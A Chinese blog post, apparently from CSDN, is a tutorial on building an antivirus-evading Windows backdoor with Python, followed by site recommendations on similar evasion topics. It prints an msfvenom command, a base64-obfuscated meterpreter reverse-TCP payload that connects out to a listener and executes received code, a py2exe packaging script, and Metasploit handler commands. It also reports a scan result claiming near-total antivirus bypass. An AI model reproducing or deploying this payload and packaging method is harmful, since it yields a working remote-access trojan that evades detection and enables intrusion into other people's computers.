python打包的exe如何免杀_使用Python进行防病毒免杀解析

最新推荐文章于 2024-05-24 13:46:18 发布
最新推荐文章于 2024-05-24 13:46:18 发布
阅读量1.2k 收藏 2
点赞数
文章标签: python打包的exe如何免杀

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

2019121309154740.png

evil.py 代码如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows,同时创建一个setup.py文件:

from distutils.core import setup

import py2exe

setup(

name = 'Meter',

description = 'Python-based App',

version = '1.0',

console=['evil.py'],

options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},

zipfile = None,

)

下面的方法运行 evil.py,生成可执行文件。

python ./setup.py py2exe

2019121309154741.png

0x03 设置监听端口

Kali 运行Metasploit,设置监听:

msfconsole

use exploit/multi/handler

set PAYLOAD python/meterpreter/reverse_tcp

set LHOST 192.168.28.128

set LPORT 443

run

在Windows中运行evil.exe,获得一个meterpreter的会话

2019121309154742.png

0x04 免杀验证

确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。

这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

2019121309154843.png

扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org

参考文章:

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对脚本之家网站的支持!

如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

weixin_39984952
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pyinstaller各种坑
qq_42094066的博客
12-26 573
目录pyinstaller打包之后运行exe报错pyinstaller打包exe之后被360误杀 pyinstaller打包之后运行exe报错 报错信息: 触发的原因:打包时加入了-w参数,也就是不显示命令行窗口,但是代码中有input() 解决方式:把代码中的input()都去掉或者把打包时的-w去掉 pyinstaller打包exe之后被360误杀 病毒类型: 说明:被误杀了,唉~,总不能在用户使用的时候告诉用户退出360或者添加白名单吧,老大又不想把软件给360发过去,只能自食其力 等我搞好
pythonexe怎么不会被杀毒软件_使用Python Shells绕过杀毒软件
weixin_33045057的博客
02-04 2256
一、绕过杀毒软件Why?1、使用绕过反病毒软件的方式要比禁用杀毒软件更加安全;2、展示客户端的反病毒软件是多么脆弱的非常有趣。How?如果你使用二进制,而这个二进制文件被You can bypass AV修改导致它的签名被移除了,然后加密、打包,修改源代码或者重新编辑源代码使用我个人最喜欢的自定义程序。When?只要shell写入磁盘,你就可以开始进行啦!二、为什么选择Python?Python...
python学习笔记——pythonexe免杀
小橙子的博客
07-07 907
思路: 将敏感代码转码,使用时解码再执行。 参考: https://blog.csdn.net/qq_32261191/article/details/108994177 一、敏感代码使用base64编码 #-*- coding: utf-8 -*- import base64 str = """ print('123') """ #编码 encode = base64.b64encode(str.encode('utf-8')) print(encode) 结果: b'CnByaW50
360卫士、杀毒对python打包文件报毒解决(使用pyinstaller打包
最新发布
weixin_54857594的博客
05-24 657
更换旧版本python(实测3.6.8可用)
使用 pyinstall 打包实现免杀后门
CSDN
05-28 1万+
免杀(Evasion)是指绕过或规避安全软件(如杀毒软件、防火墙等)的检测和阻止,使恶意软件、恶意代码或攻击载荷能够成功地绕过安全措施并在目标系统上执行而不被检测或拦截。免杀技术旨在使恶意软件具有更高的潜入和持久性,以避免被安全软件及时发现和清除。
Python程序打包exe
qq_33769308的博客
05-24 208
通过Pyinstaller完成python打包EXE文件的步骤
使用Python进行防病毒免杀解析
09-18
主要介绍了使用Python进行防病毒免杀,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
Python库 | yara_scanner-1.0.10.tar.gz
03-12
`yara_scanner`库则提供了Python接口,使得在Python环境中更方便地利用YARA规则进行扫描。 在`yara_scanner-1.0.10`的压缩包中,我们通常会找到以下组件: 1. `setup.py`:这是Python项目安装的入口文件,通过运行`...
ghsc268713140001121.zip_Windows编程_Python_
08-11
标题中的“ghsc268713140001121.zip”看起来像是一个GitHub仓库的归档文件名,而“Windows编程_Python_”则表明这个压缩包的内容与使用Python进行Windows平台的编程有关。描述中提到的“autopkg-virustotalanalyzer...
Python库 | scipion_em_cryoassess-3.0.3-py3-none-any.whl
02-19
这个库的版本为3.0.3,且已打包成`.whl`格式,这是一种便于安装和分发的Python软件包。 1. **Python库的概念与作用** Python库是由一系列预定义的函数和模块组成的集合,它们提供特定的功能,如数据处理、网络通信...
python制作免杀软件教程及工具.zip
07-26
本资源会教你如何用python制作免杀软件,并提供了所需的代码工具和脚本,亲测能够过360安全卫士和火绒。
Python常见问题:1、pyinstaller打包的各种异常及其解决方案
遇雪长安的博客
08-21 1万+
pyinstaller打包的各种异常及其解决方案
pyinstaller编译出的exe被杀毒软件认为是木马
妙音
11-25 2万+
python文件转为独立的exe,放在windows上运行。结果腾讯管家马上提示有可能是木马把它删除了 一脸懵逼,我良民,咋成木马了呢。思前想后,我做了什么,被认为很危险。原来我用了os.system。下面是演示 python文件 #xxx.py import os cmd="xxxxx" os.system(cmd) 编译exe #编译完成,系统提示发现木马 python -m P...
python用turtle画月亮_使用Python的turtle画小猪乔治和哆啦 A 梦
weixin_39688750的博客
11-23 862
本人是Python新人小白,欢迎各位大佬指正,本文介绍的是用Python的turtle画一只小猪乔治。还有本人画画基础超级差= =没天赋,画参考度娘上的一个图片画的。先上总代码,然后说说我写的思路,import turtle as t'''t.pu() 提起画笔t.pd() 移动时绘制图形,缺省时也为绘制t.seth 设置当前朝向为angle角度t.begin_fill() 准备开始填充图...
Python 打包exe 遇到的一堆坑
theeternal的博客
01-01 2万+
Python3.6 打包exe 遇到的一堆坑
将自己的python程序打包成.exe/.app(秀同学一脸呐)
热门推荐
MrLevo520的博客
07-06 20万+
Windows 10 x64macOS Sierra 10.12.4Python 2.7 准备好装哔~了么,来吧,做个真正意义上的绿色小软件 Win下发布应用起因 今天实验室同学看到我的乞丐版二输入规则器,他挺感兴趣的,也想要玩玩,但是他没有装python的环境,总不能让他一直玩我电脑吧,所以想到了将程序打包exe,直接运行!想法一出来,根本挡不住啊,说干就干,先百度python打包exe
【渗透测试笔记】之【Python免杀——两行代码免杀。VT查杀率:10/68(思路:将ShellCode和Loader一起分离免杀)】
AA8j的博客
10-24 5609
文章目录1. shellcode Loader1.1 生成shellcode1.2 shellcode loader 脚本上线测试1.3 使用pyinstaller生成exe文件上线测试1.4 VT查杀率:24/682. ShellCode 分离2.1 上传加密后的shellcode2.2 改写shellcode loader2.3 shellcode 分离后shellcode loader脚本上线测试2.4 shellcode 分离后,使用pyinstaller生成exe文件上线测试2.5 VT查杀率:1
python打包pyqt成exe_pyqt5程序打包exe
05-14
你可以使用Pyinstaller来将PyQt5程序打包exe文件。 首先,确保你已经安装PyQt5和Pyinstaller。然后,在命令行中进入你的Python程序所在的目录,输入以下命令: ``` pyinstaller your_program.py --onefile --windowed ``` 其中,`your_program.py`是你的Python程序的文件名。`--onefile`参数将所有的依赖文件打包进一个exe文件,`--windowed`参数将程序运行在无控制台的窗口模式下。 执行完上述命令后,Pyinstaller会自动将你的程序打包成一个exe文件,放在`dist`目录下。 注意,由于PyQt5使用了动态链接库,因此在打包exe文件时需要将相关的库文件也一起打包进去。你可以使用以下命令来手动将库文件复制到exe文件所在的目录: ``` pyinstaller your_program.py --onefile --windowed --add-data "C:\Python\Lib\site-packages\PyQt5\Qt\bin;Qt\bin" ``` 其中,`"C:\Python\Lib\site-packages\PyQt5\Qt\bin;Qt\bin"`是你需要打包的库文件路径,路径中的分号用于分隔不同的路径。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值